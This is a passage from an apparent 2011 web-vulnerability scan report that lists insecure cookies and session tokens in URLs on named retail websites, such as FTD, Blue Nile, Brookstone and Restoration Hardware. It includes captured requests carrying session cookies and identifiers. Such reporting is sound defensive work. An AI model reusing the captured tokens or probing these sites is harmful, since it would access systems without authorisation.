Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c; pc1=%7b%7d; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Sweet%20Shop%5C%22%2C%5C%22type%5C%22%3A%5C%22index%5C%22%2C%5C%22value%5C%22%3A%5C%22%252Fsweet-shop-ctg%252Fproduct-sweet-shop%252F%253Fmarkcode%253D528%5C%22%2C%5C%22prevName%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22prevType%5C%22%3A%5C%22home%5C%22%2C%5C%22prevValue%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=51933897653166366864628919699136; s_cc=true; last_active=1305541288018; mbcs=837A23D2-E1A6-55BC-B51D-1B2EBC885D29; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DCategory%25253Aproduct_sweet_shop%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305541789414

Response

9.10. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

track_id=baabe59f09870e0c5f1e6606009b9fb7e5a425b7fc231e55d6f4be1dbe08dc9c; expires=Thu, 13 May 2021 02:09:59 GMT; path=/; domain=.ftd.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_id=22359894871736752832630692038142; s_cc=true; last_active=1305510812803; mbcs=129049F1-9E12-5C65-0540-FAB5539F48D0; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511186703

Response

9.11. https://ordering.ftd.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ordering.ftd.com
Path:	/signin/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /signin/ HTTP/1.1
Host: ordering.ftd.com
Connection: keep-alive
Referer: https://ordering.ftd.com/signin/
Cache-Control: max-age=0
Origin: https://ordering.ftd.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=677673227F5D107F0021C31926AF1C6A; TLTUID=677673227F5D107F0021C31926AF1C6A; si_path=1305510017585; bcp_path=1305510017585; scp_path=1305510017585; pp_path=1305510017585; mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457; s_vi=[CS]v1|26E84041051D2510-60000104200A48E2[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221305510024780_3248%22%2C%22reccancelled%22%3Atrue%7D; markcode=528; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D528%5C%22%7D%22%7D; v_id=11503077676663641757469614643386; s_cc=true; last_active=1305510812803; auto_signed_out=; s_sq=ftdprod%3D%2526pid%253DHome%252520Page%2526pidt%253D1%2526oid%253Dhttps%25253A//ordering.ftd.com/528/signin/%252523forgot-password%2526ot%253DA; fsr.a=1305511191739; track_id=bfa25c84bebbf15e8bc91502042c4463801bcd004d6700fcd6f4be1dbe08dc9c
Content-Length: 120

AID=myaccount_signin&website_id=528&reminder_service=&new=&email_isvalid=0&submitted=1&email=&password=&x=22&y=9&source=

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:28:24 GMT
Server: Apache
Set-Cookie: auto_signed_out=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: create_account_from_toolbar=0; expires=Sun, 15 May 2011 10:28:25 GMT; path=/; domain=.ftd.com
Set-Cookie: auto_signed_out=; expires=Sat, 03 Jan 1970 05:00:02 GMT; path=/
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: pc1=%7b%7d; domain=.ftd.com; path=/; expires=Thu, 01 Jan 2099 05:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private, no-store, max-age=0
Expires: Mon, 16 May 2011 10:28:25 GMT
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 114156

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.c
...[SNIP]...

9.12. https://secure.bluenile.com/accounts/account-sign-in.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.bluenile.com
Path:	/accounts/account-sign-in.html

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:06:40 GMT; Path=/
bncust=ver~1&SignInURL~http%3A%2F%2Fwww.bluenile.com%2F; Domain=.bluenile.com; Expires=Tue, 15-May-2012 02:06:40 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
Referer: http://www.bluenile.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response

9.13. https://www.brookstone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.brookstone.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS657dfa=0b3c2fa6061f93d60514f85a08946e42e754034066e5db8e4dd0fe1860ac0ec56e0e0800; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543325583%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20ttc%3D1305541525579%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
ETag: W/"52413-1280871734000"
Last-Modified: Tue, 03 Aug 2010 21:42:14 GMT
Content-Type: image/x-icon
Content-Length: 52413
Date: Mon, 16 May 2011 10:36:08 GMT
Set-Cookie: TS657dfa=0b3c2fa6061f93d60514f85a08946e42e754034066e5db8e4dd0fe1860ac0ec56e0e0800; Path=/

..............h.......(....... ...............................00/.EED.............""!.....**).++*.HHH.997.221.443.............]]\..... .....%%$.....##".RRQ.gff.''%...........-.................III...
...[SNIP]...

9.14. https://www.brookstone.com/formhandlerservlet previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.brookstone.com
Path:	/formhandlerservlet

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS657dfa=2eff89a1b2ef875f19c572c08f6b8043e754034066e5db8e4dd0fe1660ac0ec56e0e0800; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /formhandlerservlet?currentNodeLink=/shoppingCart.jsp&formName=updateCart_checkout HTTP/1.1
Host: www.brookstone.com
Connection: keep-alive
Referer: http://www.brookstone.com/shoppingCart.jsp.vr
Cache-Control: max-age=0
Origin: http://www.brookstone.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E841FF051D3756-4000010C200DDEB1[CE]; JSESSIONID=B4E0235D8822C4DE7BE6C831C54E4E62; TS657dfa=f5d54e710c8ae3d5dcd77d6f57bcade2e754034066e5db8e4dd0fb6760ac0ec56e0e0800; s_pers=%20s_nr%3D1305511115723%7C1368583115723%3B%20s_lv%3D1305511115727%7C1400119115727%3B%20s_lv_s%3DFirst%2520Visit%7C1305512915727%3B%20s_vs%3D1%7C1305543312191%3B; s_sess=%20s_evar2%3Dsubcategorylandingpage_home_beanbag_chairs_kids%257Cc1topproducts1fdt%257C11370241%3B%20s_cc%3Dtrue%3B%20s_sq%3Dbstoneprod%253D%252526pid%25253Dcheckout%2525253Acart%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.brookstone.com/shoppingCart.jsp.vr%25252523_4%252526oidt%25253D1%252526ot%25253DA%252526oi%25253D1%3B
Content-Length: 21

quantity_1343815425=1

Response

9.15. https://www.restorationhardware.com/my-account/forgot-password.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/forgot-password.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS1c138a=b72ce5406b61a765c4dbe2b4990160aa2efa223a5124b4964dd0ffea; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/forgot-password.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; engagement=4; fsr.s={"v":1,"rid":"1305509997099_983249","pv":3,"to":5,"c":"https://www.restorationhardware.com/my-account/sign-in.jsp","lc":{"d0":{"v":3,"s":false,"e":1}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; cmRS=&t1=1305511192547&t2=1305511197283&t3=1305541160118&fti=&fn=UNDEFINED%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20sign-in&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517&ul=https%3A//www.restorationhardware.com&rf=http%3A//www.restorationhardware.com/content/promo.jsp%3Fid%3D138040%26%26link%3DSFGalleryStore

Response

9.16. https://www.restorationhardware.com/my-account/register.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/register.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS1c138a=c8ca4c79fc3e7bb28d932b5bb1dcf3292efa223a5124b4964dd101e1; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/register.jsp HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/forgot-password.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; TS1c138a=27552492896cbb9145e280ea3c546c112efa223a5124b4964dd0fed4; engagement=5; fsr.s={"v":1,"rid":"1305509997099_983249","pv":4,"to":5,"c":"https://www.restorationhardware.com/my-account/forgot-password.jsp","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0,"f":1305541164254,"cp":{"my-account":"visited"}}; cmRS=&t1=1305541182545&t2=1305541183619&t3=1305541273137&t4=1305541164256&fti=&fn=requestPassword%3A0%3B&ac=&fd=&uer=&fu=&pi=my-account%20forgot-password&ho=cimg-1.restorationhardware.com/cm%3F&ci=90007517

Response

9.17. https://www.restorationhardware.com/my-account/sign-in.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/my-account/sign-in.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS1c138a=ef27e626254569019b6a3249227030c92efa223a5124b4964dd08c1b; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /my-account/sign-in.jsp?link=topnav_signin HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: http://www.restorationhardware.com/content/promo.jsp?id=138040&&link=SFGalleryStore
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757}; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511164164

Response

9.18. https://www.restorationhardware.com/sitewide/data/json/profile-status.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/sitewide/data/json/profile-status.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS1c138a=5bd8da43812e2d44f3717ac9451ad5a82efa223a5124b4964dd08c2a; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/data/json/profile-status.jsp?_=1305511192551 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; engagement=3; fsr.a=1305511192538; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}

Response

9.19. https://www.restorationhardware.com/sitewide/includes/header/expanding-banner-controller.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.restorationhardware.com
Path:	/sitewide/includes/header/expanding-banner-controller.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

TS1c138a=f5d76e447a12f51b020b9a893d636ab62efa223a5124b4964dd08c32; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sitewide/includes/header/expanding-banner-controller.jsp?categoryId=&section=my-account&subsection=sign-in&_=1305511197171 HTTP/1.1
Host: www.restorationhardware.com
Connection: keep-alive
Referer: https://www.restorationhardware.com/my-account/sign-in.jsp?link=topnav_signin
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=Wlhqnnp++zh3PRP2EtG-iQ**.782P2R9; __utmz=108701569.1305509985.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); promobanner=viewed; TS1c138a=5027a1be02767df2db70577946ccc3192efa223a5124b4964dd0899e; __utma=108701569.1225998754.1305509985.1305509985.1305509985.1; __utmc=108701569; __utmb=108701569.3.10.1305509985; fsr.s={"v":1,"rid":"1305509997099_983249","pv":2,"to":5,"c":"http://www.restorationhardware.com/","lc":{"d0":{"v":2,"s":false}},"cd":0,"sd":0,"f":1305511158757,"cp":{"my-account":"visited"}}; engagement=4; fsr.a=1305511197072

Response

10. Session token in URL previous next
There are 7 instances of this issue:

http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard
http://t.p.mybuys.com/webrec/wr.do
http://www.acehardware.com/storeLocServ
http://www.bluefly.com/
http://www.bluefly.com/myfly/login.jsp
http://www.facebook.com/extern/login_status.php
https://www.toshibadirect.com/images/ui5/btn_login.gif

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

10.1. http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://mbox12.offermatica.com
Path:	/m2/guitarcenter/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://mbox12.offermatica.com/m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34

Request

GET /m2/guitarcenter/mbox/standard?mboxHost=www.guitarcenter.com&mboxSession=1305510019406-714170&mboxPC=1305510019406-714170.17&mboxPage=1305510818677-601208&mboxCount=1&mbox=GC_hp_events&mboxId=0&mboxURL=http%3A%2F%2Fwww.guitarcenter.com%2F%3FCJAID%3D10453836%26CJPID%3D2537521&mboxReferrer=&mboxVersion=34 HTTP/1.1
Host: mbox12.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.guitarcenter.com/?CJAID=10453836&CJPID=2537521
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 167
Date: Mon, 16 May 2011 01:53:40 GMT
Server: Test & Target

mboxFactories.get('default').get('GC_hp_events',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1305510019406-714170.17");

10.2. http://t.p.mybuys.com/webrec/wr.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://t.p.mybuys.com
Path:	/webrec/wr.do

Issue detail

The URL in the request appears to contain a session token within the query string:

http://t.p.mybuys.com/webrec/wr.do?client=FTD&sessionId=129049F1-9E12-5C65-0540-FAB5539F48D0&pt=h&mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457&lang=en&v=4.7.3&mbts=1305510812851&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F

Request

GET /webrec/wr.do?client=FTD&sessionId=129049F1-9E12-5C65-0540-FAB5539F48D0&pt=h&mbcc=386C0C34-BEDD-551C-BC5F-0E4277B78457&lang=en&v=4.7.3&mbts=1305510812851&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=51654E8D34B839005773ACAD4995CED6; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=121DDBF01A174938896EB120A64A3127; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 05:07:43 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>

10.3. http://www.acehardware.com/storeLocServ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.acehardware.com
Path:	/storeLocServ

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.acehardware.com/storeLocServ?light=true&token=ACE&operation=radiusSearch&radius=30&lat=44.5&lon=-72.646&time=1305510862342

Request

GET /storeLocServ?light=true&token=ACE&operation=radiusSearch&radius=30&lat=44.5&lon=-72.646&time=1305510862342 HTTP/1.1
Host: www.acehardware.com
Proxy-Connection: keep-alive
Referer: http://www.acehardware.com/home/index.jsp
X-Prototype-Version: 1.4.0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=vLQsNQBSZphCcjtDjLwwTnfpkzNq3J0JlY9vd1F9mv7FzdpT4zqh!-1418241072; browser_id=125602208394; __g_c=w%3A0; __utmz=185450681.1305510171.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.session={"v":1,"rid":"1305510186434_570135","pv":1,"to":3,"c":"http://www.acehardware.com/home/index.jsp","lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1305510830898}; __utma=185450681.2052200100.1305510171.1305510171.1305510171.1; __utmc=185450681; __utmb=185450681.2.10.1305510171; s_pers=%20s_lastvisit%3D1305510172069%7C1400118172069%3B%20s_nr%3D1305510836971%7C1308102836971%3B%20gpv_p27%3DHome%2520Page%7C1305512636976%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; fsr.a=1305510861947

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:12 GMT
Server: Apache/2.0.63 (Unix)
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/x-json
Content-Length: 33

{ "RESULTS" : []
,
"COUNT" : 12}

10.4. http://www.bluefly.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
